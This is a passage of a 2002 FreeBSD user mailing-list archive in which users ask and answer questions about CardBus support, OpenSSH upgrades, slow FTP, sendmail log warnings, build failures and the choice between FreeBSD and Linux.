26 Jun 2002 20:41:01 +0800 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0005_01C21D51.C8D1BBE0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0005_01C21D51.C8D1BBE0 Content-Type: text/plain; charset="big5" Content-Transfer-Encoding: quoted-printable I have a question: When 32-bit card bus can support by FreeBSD?! -----just like FreeBSD system--- ------=_NextPart_000_0005_01C21D51.C8D1BBE0 Content-Type: text/html; charset="big5" Content-Transfer-Encoding: quoted-printable
I have a question:
        When = 32-bit=20 card bus can support
          =20 by FreeBSD?!
          &nbs= p;         -----just=20 like FreeBSD system---
------=_NextPart_000_0005_01C21D51.C8D1BBE0-- ========================================================== PC home ¹q¤l«H½c¡A¥Ó½Ð½Ð¦Ü: http://www.pchome.com.tw PC home Online ºô¸ô®a®x¡G·|­û²Ä¤@¡A¥xÆW³Ì¤jªº¤J¤fºô¯¸ ========================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:39:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id 2F0E137B408 for ; Wed, 26 Jun 2002 05:39:20 -0700 (PDT) Received: (qmail 5420 invoked by uid 417); 26 Jun 2002 12:39:14 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 26 Jun 2002 12:39:14 -0000 Received: from unknown ([216.194.4.88]) (AUTH: LOGIN yid@softhome.net) by softhome.net with esmtp; Wed, 26 Jun 2002 06:39:11 -0600 Date: Wed, 26 Jun 2002 08:39:12 -0400 From: Joshua Lee To: freebsd-reply@akruijff.dds.nl Cc: freebsd@akruijff.dds.nl, Lenderman22@aol.com, questions@FreeBSD.ORG Subject: Re: how to get FreeBSD [was: help!] Message-Id: <20020626083912.3a03e393.yid@softhome.net> In-Reply-To: <1801994628.20020626121836@dds.nl> References: <1801994628.20020626121836@dds.nl> Organization: Plan B Software Labs X-Mailer: Sylpheed version 0.7.5claws (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002 12:18:36 +0200 Alex wrote: > You can install FreeBSD in different ways. One is online install. You > need to have a connection before you install. So you probably wan't > to download the cd before you install. > > You can download this with ftp from ftp.freebsd.org (login anonymous) > then go to the directory: /pub/FreeBSD/ISO-IMAGES-i386/4.6/ and > download either disc1.iso. If you want to limit the donwload you could > try mini.iso, but you miss out on a lot of stuf. (Sorry for the duplicate message, I didn't hit reply-all). If you're not a Unix neewbie get the mini-iso if you're on dialup. Then get X Windows and other goodies via the ports collection. Downloading 600 megabyte ISOs via dialup is a long and error-prone process. > Another option is to buy the cd. I looked around for a wail but i > didn't find the site where you can buy these. bsdmall sells them. CompUSA is also a good place for them, they were selling FreeBSD Power Pack for half price ($50) last time I checked. (The base CD set, plus tools CDs and a manual.) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:43:28 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragoncrest.jasnetworks.net (dragoncrest.jasnetworks.net [65.194.254.12]) by hub.freebsd.org (Postfix) with ESMTP id 69DD937B400 for ; Wed, 26 Jun 2002 05:43:19 -0700 (PDT) Received: from works (works.jasnetworks.net [192.168.0.2]) by dragoncrest.jasnetworks.net (8.12.3/8.11.6) with ESMTP id g5QCt3gh005147 for ; Wed, 26 Jun 2002 08:55:04 -0400 (EDT) (envelope-from raiden23@netzero.net) Message-Id: <4.2.0.58.20020626084404.00a02470@pop.netzero.net> X-Sender: raiden23@pop.netzero.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 26 Jun 2002 08:50:52 -0400 To: FreeBDS-Questions From: Lord Raiden Subject: Re: Upcoming OpenSSH vulnerability (fwd) In-Reply-To: <20020626064124.GA53337@happy-idiot-talk.infracaninophi> References: <20020625232606.C381@fishballoon.dyndns.org> <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> <20020625205840.B381@fishballoon.dyndns.org> <20020625205928.GA50230@happy-idiot-talk.infracaninophi> <20020625232606.C381@fishballoon.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ok, I got a question that might sound really stupid, but I thought I'd ask it anyways just to be sure I got the right answer. I'm looking for the command to restart my SSH daemon without it causing any hickups so that I don't have to reboot to kick in the new changes. I just did the upgrade to 3.3p1 because of the security vulnerability but haven't restarted the server because it was late and because last time I did the upgrade I screwed something up bad enough I had to reboot to clear it. (*shrug* Hey, even top admins screw up once in a while. hehe) Also, when it was installing I saw something that looked peculiar, but I don't think it had any negative effects, but I thought I'd ask anyways. Here's what I saw. >> /usr/local/etc/ssh/ssh{,d}_config exists, not being replaced! >> If this is left over from another version of SSH, you will >> need to update it to work with OpenSSH. Now, can I assume that it's safe to ignore that, or should I do something to correct that and reinstall? - The Raiden Knows "Remember amateurs built the ark -- professionals built the Titanic." - Unknown "Just when you think you have life figured out and all is going well, watch your step, for you are about to fall." - Ancient Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:43:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from one.lt (www1.one.lt [213.226.139.3]) by hub.freebsd.org (Postfix) with ESMTP id 1ABB837B407 for ; Wed, 26 Jun 2002 05:43:33 -0700 (PDT) Received: from www1.one.lt (www1.one.lt [213.226.139.3]) by one.lt (8.11.1/8.10.1) with ESMTP id g5QChQP22505 for ; Wed, 26 Jun 2002 14:43:26 +0200 Message-ID: <7052340.1025095406779.JavaMail.root@www1.one.lt> Date: Wed, 26 Jun 2002 14:43:26 +0200 (GMT+02:00) From: Mindaugas Duda To: "questions@FreeBSD.org" Subject: question about FTP Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello, I'am new in FreeBSD and other non win systems ao I have one stupid question. I make fresh FreeBSD 4.5 install and configured anonymous ftp service in /stand/sysinstall. Then I enabled ftpd daemon in inetd.conf and restarted my BSD box. All seems normal, anonFTP works, but it works very slow. My computer is connected: WinBOX<--->10MB hub<-->FreeBSDBox But the speed when I uploading to anon ftp is 60 - 90 kbps and when I downloading from my ftp speed is 1 - 15 kbps and it seems sometimes it hangs up. network cards are RTL8139 chips both (and winbox and BSDbox) At first I thought that my BSD box computer ($%&!(####@!!, but I installed Linux Slackware 8.0 and tryed ftp on it. i.e. LinuxBox<-->10MB hub<-->Winbox. The speed was 700 - 900 kbps (I think that is normal 10MB metwork speed) I tryed ftpd daemon, proftpd standalone,(on BSD) but speed is the same: 60 - 90 kbps. What I'm doing wrong??? may by my KERNEL need some options??? no firewall, no limitations is installed... the fresh install... plz help me... -- Sincerely Mindaugas mindugas77@one.lt --> http://www.one.lt - your number one mobile email service! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:46:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from dragoncrest.jasnetworks.net (dragoncrest.jasnetworks.net [65.194.254.12]) by hub.freebsd.org (Postfix) with ESMTP id 630CD37B400 for ; Wed, 26 Jun 2002 05:46:51 -0700 (PDT) Received: from works (works.jasnetworks.net [192.168.0.2]) by dragoncrest.jasnetworks.net (8.12.3/8.11.6) with ESMTP id g5QCwkgh005150 for ; Wed, 26 Jun 2002 08:58:46 -0400 (EDT) (envelope-from raiden23@netzero.net) Message-Id: <4.2.0.58.20020626085217.009fe840@pop.netzero.net> X-Sender: raiden23@pop.netzero.net X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Wed, 26 Jun 2002 08:54:35 -0400 To: FreeBDS-Questions From: Lord Raiden Subject: Possible sendmail attack? Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hi. Was just reading my logs on one of my servers today and saw this. Never had it before so I was just curious if this was just an odd occurrence, or if I should look into it farther, because it's only one entry. Obviously if it were more I wouldn't bother to ask, but since it's just one, I'm asking. :) Here's what I saw. > Jun 25 03:40:05 wormwood sendmail[94199]: g5P7e4gg094198: Truncated MIME Content-Type header due to field size (length = 196) (possible attack) > Jun 25 03:40:05 wormwood sendmail[94199]: g5P7e4gg094198: Truncated MIME Content-Disposition header due to field size (length = 200) (possible attack) Any ideas, or can I safely ignore it? - The Raiden Knows "Remember amateurs built the ark -- professionals built the Titanic." - Unknown "Just when you think you have life figured out and all is going well, watch your step, for you are about to fall." - Ancient Proverb To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 5:56:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clientmail.ehsrealtime.com (eris.ehsrealtime.com [213.52.146.130]) by hub.freebsd.org (Postfix) with ESMTP id 355C137B405 for ; Wed, 26 Jun 2002 05:56:10 -0700 (PDT) Received: from set.ehsrealtime.com ([213.52.146.197]) by clientmail.ehsrealtime.com with esmtp (Exim 3.33 #2) id 17NCKt-000JB1-01; Wed, 26 Jun 2002 13:55:51 +0100 Received: from waynep by set.ehsrealtime.com with local (Exim 3.34 #1) id 17NDL3-0000JJ-00; Wed, 26 Jun 2002 14:00:05 +0000 From: Wayne Pascoe To: Lord Raiden Cc: FreeBDS-Questions Subject: Re: Upcoming OpenSSH vulnerability (fwd) References: <20020625232606.C381@fishballoon.dyndns.org> <5.1.1.6.2.20020624224948.02923518@pop3s.schulte.org> <20020624234646.G22328-100000@mail.radzinschi.com> <4.2.0.58.20020625134233.009992b0@pop.netzero.net> <5.1.1.6.2.20020625124040.041c50f0@pop3s.schulte.org> <20020625205840.B381@fishballoon.dyndns.org> <20020625205928.GA50230@happy-idiot-talk.infracaninophi> <20020625232606.C381@fishballoon.dyndns.org> <4.2.0.58.20020626084404.00a02470@pop.netzero.net> Date: 26 Jun 2002 14:00:05 +0000 In-Reply-To: <4.2.0.58.20020626084404.00a02470@pop.netzero.net> Message-ID: Lines: 57 User-Agent: Gnus/5.0808 (Gnus v5.8.8) XEmacs/21.4 (Civil Service) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Lord Raiden writes: > changes. I just did the upgrade to 3.3p1 because of the security Don't forget to ensure that privilege separation is enabled. The vulnerability is only stopped by this. > vulnerability but haven't restarted the server because it was late and > because last time I did the upgrade I screwed something up bad enough > I had to reboot to clear it. (*shrug* Hey, even top admins screw up > once in a while. hehe) I normally do the following: Backup my old copy of /etc/ssh/sshd_config Copy my new and shiny config to /etc/ssh/sshd_config Start a new service on port 2222 by doing /usr/local/sbin/sshd -p2222 -f /etc/ssh/sshd_config Then from my workstation, I ssh into this new daemon and check that it is the new version and all is healthy by doing ssh -v -p2222 boxname Check the output of -v to make sure versions are correct, etc. Then once connected to port 2222 I kill the binary listening on port 22. Do a ps auxww | grep sshd and kill the one WITHOUT -p2222 in the command line :) Start a new ssh daemon on port 22 by doing /usr/local/sbin/sshd -f /etc/ssh/sshd_config Login to this and kill the daemon on port 2222. Edit my rc.conf file if required to specify sshd_program and sshd_flags arguments. > >> /usr/local/etc/ssh/ssh{,d}_config exists, not being replaced! > >> If this is left over from another version of SSH, you will > >> need to update it to work with OpenSSH. > > Now, can I assume that it's safe to ignore that, or should I > do something to correct that and reinstall? You shouldn't ignore it. Chances are that there are new directives in the new config file (like the privilegeseparation one for example) that you will need. I would suggest looking in the openssh-portable/work/* directories for a sample config file and tailoring that to match your original one, but with any new features that you need. HTH. -- - Wayne Pascoe - http://www.penguinpowered.org.uk/wayne/ Things fall apart; the centre cannot hold; Mere anarchy is loosed upon the world. - Yeats To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6: 6:13 2002 Delivered-To: freebsd-questions@freebsd.org Received: from midway.uchicago.edu (midway.uchicago.edu [128.135.12.12]) by hub.freebsd.org (Postfix) with ESMTP id 303E437B405 for ; Wed, 26 Jun 2002 06:06:09 -0700 (PDT) Received: from Yggdrasil (adsl-68-20-38-180.dsl.chcgil.ameritech.net [68.20.38.180]) by midway.uchicago.edu (8.12.2/8.12.2) with ESMTP id g5QD68Is020557; Wed, 26 Jun 2002 08:06:08 -0500 (CDT) Content-Type: text/plain; charset="big5" From: David Syphers Reply-To: dsyphers@uchicago.edu To: "mickey" , Subject: Re: when 32-bit card bus can support? Date: Wed, 26 Jun 2002 08:06:12 -0500 User-Agent: KMail/1.4.1 References: <000801c21d0e$bb2bc230$124ffea9@workstation> In-Reply-To: <000801c21d0e$bb2bc230$124ffea9@workstation> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200206260806.12172.dsyphers@uchicago.edu> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wednesday 26 June 2002 07:41 am, mickey wrote: > I have a question: > When 32-bit card bus can support > by FreeBSD?! The -current branch supports cardbus. -stable does not, and never will, as the new bus architecture is too complex to MFC. -David To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6:17:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id 4E81D37B401 for ; Wed, 26 Jun 2002 06:17:18 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5QDGft04862; Wed, 26 Jun 2002 09:16:42 -0400 Date: Wed, 26 Jun 2002 09:16:41 -0400 (EDT) From: David Kramer To: nicolas jullia Cc: freebsd-questions@FreeBSD.ORG Subject: Re: a quesion of compatibility In-Reply-To: <1025090989025908@caramail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, nicolas jullia wrote: > heelo i would say if my videocard was supported by the new > realese of freeBsd > I have an Creative Labs Banshe on agp slot with 16 Mo of > ram. The best way to get your question answered is to look it up on the xfree86.org website. Make sure you look at the list for the version that comes with the new FreeBSD. ------------------------------------------------------------------- DDDD David Kramer http://thekramers.net DK KD "On two occasions, I have been asked [by members of DKK D Parliament], 'Pray, Mr. Babbage, if you put into the machine DK KD wrong figures, will the right answers come out?' I am not DDDD able to rightly apprehend the kind of confusion of ideas that could provoke such a question." -- Charles Babbage To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6:18:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from eauge.isdnet.net (eauge.fr.cw.net [62.4.3.212]) by hub.freebsd.org (Postfix) with ESMTP id BCEF337B405 for ; Wed, 26 Jun 2002 06:18:15 -0700 (PDT) Received: from localhost (eau@localhost) by eauge.isdnet.net (8.11.6/8.11.6) with ESMTP id g5QDGAv53343 for ; Wed, 26 Jun 2002 15:16:10 +0200 (CEST) (envelope-from eau@eauge.isdnet.net) Date: Wed, 26 Jun 2002 15:09:05 +0200 (CEST) From: Eric AUGE Reply-To: Eric AUGE To: freebsd-questions@freebsd.org Subject: buildworld fails!! :/ Message-ID: X-GPG-Fingerprint: 5EF0 B98F E20E 9044 9A3C 22A9 2FF5 39A6 C93D 9758 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hello, for unknown reasons i got this when i buildworld from 4.5->4.6 [..snipped..] mtree -deU -f /usr/src/include/../etc/mtree/BSD.include.dist -p /usr/obj/usr/src/i386/usr/include cd /usr/src/include/../sys; sh /usr/src/tools/install.sh -C -o root -g wheel -m 444 cam/*.h /usr/obj/usr/src/i386/usr/include/cam usage: install [-bCcpSsv] [-B suffix] [-f flags] [-g group] [-m mode] [-o owner] file1 file2 install [-bCcpSsv] [-B suffix] [-f flags] [-g group] [-m mode] [-o owner] file1 ... fileN directory install -d [-v] [-g group] [-m mode] [-o owner] directory ... *** Error code 64 Stop in /usr/src/include. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. any ideas to cure this !?! Regards, - -- Eric. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE9GbzzL/U5psk9l1gRAn/dAKCc8+Gj3Lqv9DWQYUFbUS7zvm9QGACbBcHo FuTZ+Yk4kOUw7nik+uGTvZY= =LFvb -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6:40:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from kramer.thekramers.net (dsl092-068-235.bos1.dsl.speakeasy.net [66.92.68.235]) by hub.freebsd.org (Postfix) with ESMTP id AD38C37B401 for ; Wed, 26 Jun 2002 06:40:29 -0700 (PDT) Received: from localhost (david@localhost) by kramer.thekramers.net (8.11.6/8.11.0) with ESMTP id g5QDeEj05052; Wed, 26 Jun 2002 09:40:14 -0400 Date: Wed, 26 Jun 2002 09:40:13 -0400 (EDT) From: David Kramer To: "Roger 'Rocky' Vetterberg" Cc: freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: <3D198036.7020409@rambo.simx.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, Roger 'Rocky' Vetterberg wrote: > I suspected this would start one of those thread that never dies, > thats why I clearly stated that it was only my personal opinion. When I started this thread, I specifically said I was looking for facts, not "Will that be the ten minute argument, or the full half hour?", because I didn't want a bunch of name calling either. > First, let me assure you that Im not one of the zealots that only > has eyes for one os and all other software is inferior to their > favorite. I frequently use all versions of Windows and every And I appreciate that. You are the kind of person I was hoping would be able to give me a fair comparison. > The things I dont like about linux is the madness of libc and > dependencies, rpm's, the different distributions that all seem to > have their own idea about what path to follow, and the enormous > hype that follows it. I'm Associate Director at the Boston Linux and UNIX group (http://www.blu.org) (we also cover *BSD, but you can only make the name so long ;). Our last meeting was about UNIX standards, and this was a very hot topic at that meeting. There are Linux distros I would love to check out (like Mandrake), but I'm afraid to because different distros store things in different places, some have /opt and some don't, some are using differernt gcc or libraries. This is definitely an issue for me, and a prime motivator for moving away from it. I have to go through the collection of ports and make sure everything I need is there, but I'm sure it is. BTW, is there a way to check what software is installed on your box? Is there an automated way of uninstalling ports? I couldn't find this info on freebsd.org. > People that know nothing about computers > still know the word linux. They may have a totally screwed idea > about what it really is, but they know its something really cool > and advanced and that you can make millions on dollars in profit > if you use it. *sigh* Popular != Good. See entry under "M$FT". But that's not where I'm coming from. I've been using some flavor of *NIX for about 12 years, and Linux for about 7 years I think. That's why I'm looking for the technically superior solution. Popularity does figure into the equasion somewhat because I want to keep my portable skills sharp, but from a user/admin point of view, there just can't be that much difference besides ports vs RPM and /etc/rc.d. > Now could this thread die, it answers very few BSD related questions. Just because the majority of the responses to my query have not stuck to my question is not reason to kill the thread. If I could *refocus* it I would. I have already received some valuable information, and am now leaning towards FreeBSD ( Runnin' with the devil..), but would like to find out a little more first. One of the aspects touted as FreeBSD's strenghts, the fact that all the software comes from one place, can also be seen as a weakness. I could get RPM's for almost anything imaginable, because if one website doesn't have it, another one will. For instance, Webmin 0.980 is available as of a few weeks ago, but the latest port is 0.970. The packages for several Linux distros is already available. --- DDDD David Kramer http://thekramers.net DK KD "The universe is a complicated interaction of 3 elements, DKK D Mr. Garibaldi. Mass, Energy, and enlightened self interest. DK KD The sooner you realize that the happier you will be." DDDD - Ambassador G'Kar, Babylon 5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6:56:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from scaup.mail.pas.earthlink.net (scaup.mail.pas.earthlink.net [207.217.120.49]) by hub.freebsd.org (Postfix) with ESMTP id D04A037B406 for ; Wed, 26 Jun 2002 06:56:47 -0700 (PDT) Received: from user-119aekg.biz.mindspring.com ([66.149.58.144] helo=ns.flncs.com) by scaup.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17NDHr-0003JP-00 for freebsd-questions@FreeBSD.ORG; Wed, 26 Jun 2002 06:56:47 -0700 Received: from mlevy (cylex [12.27.148.78]) by ns.flncs.com (Postfix) with SMTP id 6451053C8 for ; Wed, 26 Jun 2002 10:01:00 -0400 (EDT) Message-ID: <026601c21d19$96f016e0$fd6e34c6@mlevy> From: "Moti Levy" To: Subject: bsd.ports.mk Date: Wed, 26 Jun 2002 09:58:42 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG well , I just came around to read this file ( after a year of using FreeBSD ) . things look much brighter and clearer now . if you're a newbie like me I recommend a read through it ... Moti To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 6:59:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from grillolja.cs.umu.se (grillolja.cs.umu.se [130.239.40.17]) by hub.freebsd.org (Postfix) with ESMTP id EAE6637B400 for ; Wed, 26 Jun 2002 06:59:12 -0700 (PDT) Received: from gren.cs.umu.se (gren.cs.umu.se [130.239.40.187]) (using TLSv1 with cipher EDH-RSA-DES-CBC3-SHA (168/168 bits)) (No client certificate requested) by grillolja.cs.umu.se (Postfix) with ESMTP id AA2719FEB; Wed, 26 Jun 2002 15:59:11 +0200 (MEST) Date: Wed, 26 Jun 2002 15:59:11 +0200 (MEST) From: Paul Everlund To: David Kramer Cc: Roger 'Rocky' Vetterberg , Subject: Re: FreeBSD, Linux or Solaris In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, David Kramer wrote: > I have to go through the collection of ports and make sure everything I > need is there, but I'm sure it is. BTW, is there a way to check what > software is installed on your box? Is there an automated way of > uninstalling ports? I couldn't find this info on freebsd.org. Take a closer look at pkg_info, pkg_delete and pkg_add. You can also delete an installed port by going to /usr/ports/*category*/*app*/, then make deinstall. > One of the aspects touted as FreeBSD's strenghts, the fact that all the > software comes from one place, can also be seen as a weakness. I could > get RPM's for almost anything imaginable, because if one website doesn't > have it, another one will. For instance, Webmin 0.980 is available as of > a few weeks ago, but the latest port is 0.970. The packages for several > Linux distros is already available. There are pros and cons to the ports system. I personally think there's more good than bad. I'm not sure, but maybe there's a utility in the ports hierarchy that can deal with rpm's? Or maybe, use configure/make/ make install of the source? The question, which system is best, I can not answer. Have only installed Linux once, and did use it for two hours, then did an uninstall. :-) Good luck chosing the most appropriate OS for the task at hand! Best regards, Paul To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 7: 1:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gbronline.com (mail.gbronline.com [12.145.226.4]) by hub.freebsd.org (Postfix) with ESMTP id 3038D37B406 for ; Wed, 26 Jun 2002 07:01:30 -0700 (PDT) Received: from daleco [12.145.226.221] by mail.gbronline.com (SMTPD32-7.10) id A8DACAB0298; Wed, 26 Jun 2002 08:59:54 -0500 Message-ID: <00cc01c21d19$e51bfdc0$dde2910c@fbccarthage.com> From: "Kevin Kinsey, DaleCo, S.P." To: "David Kramer" , "Roger 'Rocky' Vetterberg" Cc: References: Subject: Re: FreeBSD, Linux or Solaris Date: Wed, 26 Jun 2002 09:00:56 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG ----- Original Message ----- From: "David Kramer" To: "Roger 'Rocky' Vetterberg" Cc: Sent: Wednesday, June 26, 2002 8:40 AM Subject: Re: FreeBSD, Linux or Solaris > One of the aspects touted as FreeBSD's strenghts, the fact that all the > software comes from one place, can also be seen as a weakness. I could > get RPM's for almost anything imaginable, because if one website doesn't > have it, another one will. For instance, Webmin 0.980 is available as of > a few weeks ago, but the latest port is 0.970. The packages for several > Linux distros is already available. > Well, there are a lot of options, and that's the beauty of FBSD, and perhaps Linux as well. For example, perhaps you could: a --- enable Linux compatibility and use an RPM from your fave Tux distro b --- build from source c --- check www.freshports.org and see if it's there before it's commited to /usr/ports d --- look for patches at webmin.org e --- offer to help the port maintainer get up to date? I imagine that one very 'variable' variable in the "how things get done" equation is how much time any given committer has at any given time. And, it wouldn't surprise me if, on average, there are more people working on Linux distros than FBSD. KDK > --- > DDDD David Kramer http://thekramers.net > DK KD "The universe is a complicated interaction of 3 elements, > DKK D Mr. Garibaldi. Mass, Energy, and enlightened self interest. > DK KD The sooner you realize that the happier you will be." > DDDD - Ambassador G'Kar, Babylon 5 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Wed Jun 26 7:12:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mout04.kundenserver.de (mout04.kundenserver.de [195.20.224.89]) by hub.freebsd.org (Postfix) with ESMTP id 19AFE37B400 for ; Wed, 26 Jun 2002 07:12:14 -0700 (PDT) Received: from [195.20.224.204] (helo=mrvdom00.kundenserver.de) by mout04.kundenserver.de with esmtp (Exim 2.12 #3) id 17NDWg-0007FU-00; Wed, 26 Jun 2002 16:12:06 +0200 Received: from [217.1.114.129] (helo=pD9017281.dip.t-dialin.net) by mrvdom00.kundenserver.de with esmtp (Exim 2.12 #3) id 17NDWf-0003MT-00; Wed, 26 Jun 2002 16:12:05 +0200 Date: Wed, 26 Jun 2002 16:11:53 +0000 (GMT) From: Peter Ulrich Kruppa To: Thomas Widlundh Cc: freeBSD Subject: Re: XFree86 In-Reply-To: <000201c21cf9$3e3e7430$34056dd4@chappe2> Message-ID: <20020626160728.O17435-100000@small.pukruppa.de> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Wed, 26 Jun 2002, Thomas Widlundh wrote: > Hi, > This might be a little off topic on this list, but... > Is the XF86Config file interchangeable between different types of > Unix/Linux OS's? > I have 